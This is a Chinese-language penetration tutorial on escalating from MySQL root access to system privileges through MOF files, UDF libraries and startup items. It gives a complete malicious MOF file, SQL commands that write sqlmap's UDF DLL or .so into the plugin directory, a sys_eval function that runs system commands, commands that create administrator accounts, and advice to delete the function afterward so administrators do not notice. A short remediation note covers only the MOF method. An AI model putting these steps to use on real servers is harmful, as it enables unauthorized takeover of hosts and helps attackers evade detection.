MySQL提权的三种方法参考文献 提权总结以及各种利用姿势 windows+MYSQL+UDF提权 MySQL提权的必要条件:具有MySQL的root权限,且MySQL以system权限运行。 具有执行SQL语句的权限。 获取root密码的方法: 查看数据库配置文件 关键字:config、conn、sql、data、inc、database等 下载mysql安装路径下的数据文件 安装路径下的data目录中存放的是数据库的数据信息 root账号密码存储在mysql数据库下的user表中 完整路径=安装路径+\data\mysql\user.MYD 暴力破解 MySQL数据库提权的几种方式udf提权 mof提权 开机启动脚本(启动项提权) MOF提权原理 利用了C:\Windows\System32\wbem\MOF目录下的nullevt.mof文件 利用该文件每分钟会去执行一次的特性,向该文件中写入cmd命令,就会被执行 利用条件 只使用于windows系统,一般低版本系统才可以用,比如xp、server2003 对C:\Windows\System32\wbem\MOF目录有读写权限 可以找到一个可写目录,写入mof文件 提权方法 在可写目录中上传mof文件。 把mof文件上传到C:/wmpub/nullevt.mof 把这个文件复制到C:/Windows/System32/wbem/MOF/nullevt.mof目录下 select load_file('C:/wmpub/nullevt.mof') into dumpfile 'C:/Windows/System32/wbem/MOF/nullevt.mof'
将下面这段代码复制到mof后缀的文件中 # pragma namespace("\.\root\subscription") instance of EventFilter as $EventFilter{ EventNamespace ="Root\Cimv2"; Name = "filtP2"; Query = "Select * From InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
把这个mof文件上传到目标机中,可以修改代码,进行命令执行。 目前mof提权方法用的比较少,建议使用udf脚本进行MySQL数据库提权。 补救措施 当发现服务器被使用mof提权,解决继续执行系统命令的方法: 先停止winmgmt服务:net stop winmgmt 删除文件夹:C:\Windows\System32\wbem\Repository 再重新启动winmgmt服务:net start winmgmt UDF提权(用户自定义函数提权)原理 UDF(User Defined Funtion)用户自定义函数,通过添加新的函数,对mysql服务器进行功能扩充。 信息收集 select version(); # 获取数据库版本 select user(); # 获取数据库用户 select @@basedir; # 获取数据库安装目录 show variables like ‘%plugin%’; # 查看plugin路径。
Windows UDF提权 UDF可以理解为MySQL的函数库,可以利用udf定义的创建函数。想要利用udf,必须上传udf.dll作为udf的执行库。MySQL中支持UDF扩展,使得我们可以调用DLL里面的函数来实现一些特殊的功能。 利用条件 如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的MySQL\Lib\Plugin\文件夹下,该目录默认是不存在的,需要使用webshell找到mysql的安装目录,并在安装目录下创建MySQL\Lib\Plugin\文件夹,然后将udf.dll导入到该目录。 如果mysql版本小于5.1,udf.dll文件在windows server 2003下放置于c:/windows/system32/目录,在windows server 2000下放置在c:/winnt/system32/目录。 掌握mysql数据库的root账户,从而拥有对mysql的insert和delete权限,以创建和抛弃函数。 拥有可以将udf.dll写入相应目录的权限。 基本步骤 DLL文件的获取方法 在sqlmap/data/udf/mysql目录下,在Windows目录中有32位和64位的dll文件(MySQL位数)。 文件夹中的dll文件是通过异或编码的,可以使用sqlmap/extract/cloak.py进行解码 python /sqlmap/extra/cloak/cloak.py -d -i /sqlmap/udf/mysql/windows/64/lib_mysqludf_sys.dll_ 将解码后的DLL文件(包含用户自定义函数的DLL文件)上传到可写目录,再导入到MySQL\lib\plugin\中 select LOAD_FILE('C:/可写目录/lib_mysqludf_sys.dll') into dumpfile 'C:/phpStudy2016/MySQL/lib/plugin/lib_mysqludf_sys.dll'; 将DLL中的函数引入到MySQL数据库中 创建自定义函数 create function sys_eval returns string soname 'lib_mysqludf_sys.dll'; 创建名为sys_eval的函数,返回值为string类型,调用的文件是lib_mysqludf_sys.dll 注意:需要创建.dll文件中存在的函数,可以使用十六进制编辑器打开.dll文件,查看可以被创建的函数。 使用该函数去执行系统命令提权 查看当前用户权限 select sys_eval("whoami"); 创建账号并提升为管理员权限 select sys_eval("net user winhex passw@ord /add"); select sys_eval("net localgroup administrators winhex /add"); 将之前引入的函数删除掉 防止被管理员发现,防止其他攻击者使用 drop function sys_eval; delete from mysql.func where name='sys_eval'; Linux UDF提权 简述 通过自定义库函数来实现执行任意的命令 包含用户自定义函数的文件为.so文件 要求 在my.ini的[mysqld]下,添加secure_file_priv="",不限制导入导出路径 具有数据库root账户的密码,且mysql数据库以root权限运行 具有sql语句的执行权限 导出目录可写 系统中的selinux处于关闭状态 提权过程 查找插件库的路径 show variables like '%plugin%'; 得到的结果为: Variable_name Value plugin_dir /usr/lib64/mysql/plugin 找到对应操作系统数据库的UDF库文件 sqlmap-master\data\udf\mysql\linux\64下的lib_mysqludf_sys.so_文件 将so文件(UDF库文件)进行16进制编码 将so文件的内容解码,写入到mysql插件库目录中 select unhex('so文件的16进制编码') into dumpfile '/usr/lib64/mysql/plugin/xxx.so' 查看udf库所支持的函数 注意:需要创建.so文件中存在的函数,可以使用十六进制编辑器打开.so文件,查看可以被创建的函数。 创建函数 写入之后,执行创建函数的命令,就会创建一个sys_eval的函数,用来执行系统命令,这个函数执行的系统命令全部都是system权限。 create function sys_eval returns string soname 'xxx.so'; 执行系统命令,提权 sys_eval这个函数就可以执行系统命令,括号里输入系统命令即可。 查看当前用户权限 select sys_eval("whoami"); 创建账号并提升为管理员权限 不需要判断mysql的版本,直接查看路径,直接写so文件,Linux里面的文件是so文件。 getshell之后,在终端输入whoami,发现只是apache用户权限。 寻找网站的数据库配置文件,查看数据库的账号密码,可以看到账号root密码root。 登录mysql数据库,输入show variables like '%plugin%';查看plugin路径。 得到的结果为: Variable_name Value plugin_dir /usr/lib64/mysql/plugin 我们把so文件进行16进制编码,再解码写入目录中,返回为true,写入成功。 select unhex('so文件的16进制编码') into dumpfile '/usr/lib64/mysql/plugin/xxx.so' 写入之后,执行创建函数的命令,就会创建一个sys_eval的函数,用来执行系统命令,这个函数执行的系统命令全部都是system权限。 create function sys_eval returns string soname 'xxx.so'; sys_eval这个函数就可以执行系统命令,括号里输入系统命令即可。 select sys_eval('whoami') 开机启动项提权利用MySQL,将后门写入开机启动项。同时因为是开机自启动,在写入之后,需要重启目标服务器,才可以运行。
|